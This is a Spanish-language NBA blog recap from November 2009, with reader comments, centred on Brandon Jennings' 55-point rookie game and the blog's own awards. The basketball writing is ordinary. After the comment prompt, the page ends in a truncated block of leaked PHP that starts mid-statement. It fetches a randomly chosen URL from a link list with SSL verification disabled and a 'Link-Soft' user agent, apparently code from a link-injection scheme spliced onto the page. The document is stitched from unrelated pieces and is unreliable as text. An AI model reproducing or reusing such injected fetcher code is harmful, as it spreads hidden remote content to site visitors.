La Crónica (14/11/2009)

15 de November de 2009 por TheDeerHunter

Jornada sensacional en una noche que no podíamos imaginar iba a dar tanto de sí.

Brandon Jennings, el tercer base de la Lottomatica de Roma durante el curso pasado (habría que haber visto anoche la cara de Repesa) hizo historia anotando 55 en el enfrentamiento contra (como no podía ser de otra manera) los “blandi”-Warriors. Desde el año 1968, cuando “The Pearl” registró 56 ningún rookie había hecho nada parecido. Sólo Chamberlain y Rick Barry habían hecho antes algo superior. Curiosamente este noviembre se cumplían 50 años desde que Wilt hizo otra de 55. Los dos euros que apostó Viva_Dirk por él para Rookie del año con 81 a 1 en su contra pintan ahora increíblemente bien.

Además, dos batacazos sonados. Los Celtics cerraron un “back to back” fatídico en el Conseco. Anoche Granger y Dahntay Jones dinamitaron los cimientos de la defensa y, en ataque, tampoco estuvieron para tirar cohetes. Los Pacers se ponen en positivo tras su deficiente inicio. Por su parte, los Spurs, esta vez con la plantilla al completo, perdieron su primer partido en casa contra los Thunder. El choque resultó igualadísimo y se resolvió por mínimos detalles. Terrible partido de los escoltas y aleros locales.

En el siguiente foco de interés de anoche, los Nets trataban de dejarnos mal a la hora de decir que eran el peor equipo de la historia y que con casi total seguridad saldrían de Miami con un 0-10. A 4 segundos del final ganaban de dos. Entonces sucedió esto:

Otras circunstancias noticiosas: Los Grizzlies ganaron a los diezmados Wolves con partidazo de Marc Gasol. Los Blazers hicieron lo propio en Charlotte con buena contribución de Rudy. Outlaw se lesiona para el resto de la temporada… aunque como a McMillan le sobran los aleros igual ni se percata.

En el resto de partidos, los Hawks se ensañaron con los Hornets, los Cavs sudaron para ganar a los Jazz sin Shaq casi tanto como los Pistons lo hicieron para ganar en la capital.
Por último los Bulls no tuvieron problemas contra los Sixers en el United.

PREMIOS TJNBA

MVP: El nombre propio de la jornada es Jennings. Como decía Andrés Montes, INSOLENTE!!! Buscamos mote para él. Alguien sugirió que se parece a Jazzy Jeff, en “El Príncipe de Bel Air”. Se admiten sugerencias.

El rookie: Quitando a Jennings, al que tendremos casi que poner en “sección especial” fuera de concurso en esta categoría, volvemos a destacar a Eric Maynor por los Jazz y también a Stephen Curry por los Warriors. Ninguno de los dos ganó.

La sorpresa: Además del sobresalto recién levantados por lo de Jennings (hoy es un monográfico) a mí no deja de sorprenderme la extraordinaria contribución anotadora de Dahntay Jones en Indiana. ¿No se supone que era un especialista defensivo más bien guarrete??

La decepción: Ginobili 0 de 8 y 0 de 4 en triples. Uno de esos pequeños detalles que te hacen perder un partido igualado. Si unes 4 puntos de Richard Jefferson, 0 puntos de Mason, 2 de Bogans y 6 de Finley posiblemente perderás contra cualquiera.

RAZONES PARA TRASNOCHAR:

Sin que hayan comenzado las retransmisiones vespertinas y siendo mañana lunes, sólo algunos podrán permitirse el lujo de disfrutar de las interesantes visitas de los Mavs al Palace de Detroit o la complicada salida de los Lakers a Houston. También hay un duelo Calderon Vs Nash en el mejor momento del extremeño. Será bonito de ver.

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Yo ya le tengo bautizado como ‘Smash’, suena bien y dice bastante de su juego.

    En fin, que se mantenga así todo el año!!!

      Citar

  2. max dice:
    #2

    La canasta de Wade está muy bien, por algo es un superclase, pero la defensa de Hassell es de risa. Por otra parte, lo de Marc Gasol es impresionante(17 ptos con 8-8 y 16 rebotes). Me gustaria verle en un equipo como Toronto.

      Citar

  3. Love Denise dice:
    #3

    yo a jennings lo llamaria espendiente x, o algo así, de deambular por Europa a salirse en la NBA, no le encuentro la explicación.
    No quiero desmerecer la actuación de Marc, pero… jugaba con el, para mí, el peor equipo de la NBA, y encima sin Jefferson y Love delante.

      Citar

  4. PIRATA dice:
    #4

    A Montes quizá le gustaria un mote tipo “Spaguetti nero di sepia” por su delgadez, en TV han comentado que ha batido el rècord de rookie de la franquicia, que ni mas ni menos que Kareem con 51 pts.Vaya crack!!!!

      Citar

  5. Jonatan dice:
    #5

    Pero que no me extraña macho con Don Nelson nunca se sabe
    de hecho ayer yego a jugar con jackson y magette como C y PF amos si asi pretende asegurar el rebote y defender los pick and roll ……Lastima esas lesiones de biedrins y turiaf ahora se hecha de menos a wright.

      Citar

  6. M dice:
    #6

    Juer, habrá que seguirlo, para mí ha sido una sorpresa completa, no esperaba nada de él…

      Citar

  7. toni dice:
    #7

    Cuando veo a este hombre, me viene a la cabeza el iverson de los primeros años (y mas aún al ver un video que han puesto en nba.com) y he pensado que podriamos llamarle “The Question”. ¿Qué estuvo haciendo en Italia el año pasado?
    Tanto el de Smash como el de Principe de Bel air molan y este es rebuscadillo pero tenia que decirlo. jajaja.
    Ahora falta ver si no es solo efervescente.
    Lo de los verdes y los amarillos es de chiste, de la manita.
    Un par de parejas a apuntar, la de Dahntay y Granger y los rookies Maynor y Matthews de Utah que estan supliendo con solvencia a Deron.

    pd: A ver si Pau vuelve al 100% porque entre los isquitibiales y las declaraciones de su madre…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>